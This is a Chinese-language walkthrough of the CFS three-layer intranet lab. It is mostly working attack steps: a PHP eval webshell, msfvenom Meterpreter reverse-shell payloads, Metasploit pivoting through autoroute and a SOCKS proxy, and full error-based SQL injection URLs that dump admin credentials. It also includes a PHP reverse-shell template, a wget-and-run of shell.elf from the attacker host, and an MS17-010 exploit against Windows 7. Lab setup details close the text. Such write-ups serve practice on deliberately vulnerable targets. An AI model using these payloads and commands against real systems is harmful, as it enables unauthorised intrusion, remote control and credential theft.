CFS三层网络经典版

简介: CFS三层网络经典版

kali IP:192.168.5.0/24

Goby反手一波

写shell

echo '<?php @eval($_POST[a]);?>' > /www/wwwroot/ThinkPHP/public/shell.php
蚁剑连接
http://192.168.5.143/shell.php

640.png

使用msfvenom生成对应的反向shellcode

msfvenom -plinux/x64/meterpreter/reverse_tcp LHOST=192.168.5.144 LPORT=4444 -f elf > shell.elf


执行 上线msf
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.5.144
set lport 4444
run

获取内网ip段

run get_local_subnets
Local subnet: 192.168.5.0/255.255.255.0
Local subnet: 192.168.22.0/255.255.255.0
Local subnet: 192.168.122.0/255.255.255.0
5是模拟外网 
22 是内网

添加路由

run autoroute -s 192.168.22.0/24

640.png

查看内网ip

arp -a

配置socke代理
use auxiliary/server/socks4a
直接run  代理启动
配置proxychains

扫描22

proxychains nmap -Pn -sT 192.168.22.22

浏览器设置socks4 代理 1080

二层网络

640.png

640.png

单引号报错 存在注入

查看数据库

http://192.168.22.22/index.php?r=vul&keyword=1%27%20and%20updatexml(1,concat(0x7e,%20database(),0x7e),1)--+


查看数表

http://192.168.22.22/index.php?r=vul&keyword=1'and updatexml(1,concat(0x7e,substr((select group_concat(table_name) frominformation_schema.tables where table_schema='bagecms'),1,32),0x7e),1)--+

获取字段

http://192.168.22.22/index.php?r=vul&keyword=1'and updatexml(1,concat(0x7e,substr((select group_concat(column_name) frominformation_schema.columns where table_schema='bagecms' andtable_name='bage_admin'),1,32),0x7e),1)--+

获取值 - 密码

http://192.168.22.22/index.php?r=vul&keyword=1' and updatexml(1,concat(0x7e,substr((select concat(username,0x7e,password) from bagecms.bage_admin),1,31),0x7e),1)--+

640.png

登录后台

admin 123qwe

模板 tag页面 index.php 测试下

   


写入php反弹shell
<?php 
set_time_limit(0); 
$ip=$_POST['ip'];
$port=$_POST['port'];
$fp=@fsockopen($ip,$port,$errno,$errstr);
if(!$fp){echo "error";}
else{
    fputs($fp,"\n+++++++++++++connect sucess+++++++++\n");
    while(!feof($fp)){
    fputs($fp,"shell:");
    $shell=fgets($fp);
    $message=`$shell`;
    fputs($fp,$message);
    }
fclose($fp);
}

http://192.168.22.22/index.php?r=tag

640.png

下载 shell.elf 反弹shell

kali
python -m SimpleHTTPServer 8000
shell:
wget http://192.168.5.31:8000/shell.elf
chmod 777 shell.elf
./shell.elf

三层网络

proxychains nmap -Pn -sT 192.168.33.33

640.png

乍一看 开启了135 445 永恒之蓝了解一下

扫描17-010
auxiliary/scanner/smb/smb_ms17_010

640.png

攻击

exploit/windows/smb/ms17_010_psexe
set payload windows/meterpreter/bind_tcp
set rhost 192.168.33.33
run

ok 结束

靶机地址:

链接:https://pan.baidu.com/s/16Rd-3TpKLtFIf2ObWXxN6g

提取码:957b

环境配置:

centos 双网卡

桥接  

NET 192.168.22.0/24  

登录进去 init 5  切换桌面模式 图形化配置ip

ubuntu 双网卡

NET 192.168.22.0/24  

仅主机 192.168.33.0/24

auto ens33
iface ens33 inet static
address 192.168.22.22
netmask 255.255.255.0 
gateway 192.168.22.254
auto ens38
iface ens38 inet static
address 192.168.33.22
netmask 255.255.255.0 
gateway 192.168.33.1

win7 仅主机模式

相关文章
|
2月前
|
负载均衡 安全 API
SDN网络架构分为哪三层
SDN软件定义网络是一种创新的网络架构,旨在提供更灵活、可编程和智能的网络管理。SDN的设计理念是通过将网络控制平面和数据平面分离,实现对网络行为的集中控制和编程。
|
2月前
|
网络协议 算法 数据库
|
17天前
|
机器学习/深度学习 算法 Python
深度学习初遇——自己动手实现三层神经网络
深度学习初遇——自己动手实现三层神经网络
42 4
|
4天前
|
人工智能 缓存 网络协议
网络层之三层交换、icmp协议、arp协议
网络层之三层交换、icmp协议、arp协议
|
2月前
|
网络协议 算法 网络虚拟化
|
SQL 安全 Ubuntu
CFS三层网络环境实战
靶机系列文章最后一篇,之前文章中的靶机链接,文末中会给出,请注意保存...
137 0
|
1月前
|
网络协议 算法 Linux
【嵌入式软件工程师面经】Linux网络编程Socket
【嵌入式软件工程师面经】Linux网络编程Socket
46 1
|
2天前
|
网络协议 安全 Ubuntu
7 个有用的免费 Linux 网络隧道
【7月更文挑战第4天】
12 0
7 个有用的免费 Linux 网络隧道
|
15天前
|
安全 物联网 Linux
学习Linux对网络安全的重要性
**学习Linux对网络安全至关重要:** 1. 开源操作系统广泛应用于服务器、网络设备,掌握Linux是安全专家必备技能。 2. Linux内置安全特性,如最小权限和防火墙,加上丰富的安全工具,提供强大保障。 3. 可定制性允许灵活配置,满足安全需求,开源社区提供持续更新和教育资源。 4. 学习Linux能提升攻防能力,用于系统加固和渗透测试,适应跨平台安全场景。 5. 随着云计算和物联网发展,Linux在网络安全中的角色日益关键。
39 3
|
2天前
|
网络协议 Linux 开发工具
配置Linux固定IP地址,为什么要固定IP,因为他是通DHCP服务获取的,DHCP服务每次重启都会重新获取一次ip,VMware编辑中有一个虚拟网络编辑器
配置Linux固定IP地址,为什么要固定IP,因为他是通DHCP服务获取的,DHCP服务每次重启都会重新获取一次ip,VMware编辑中有一个虚拟网络编辑器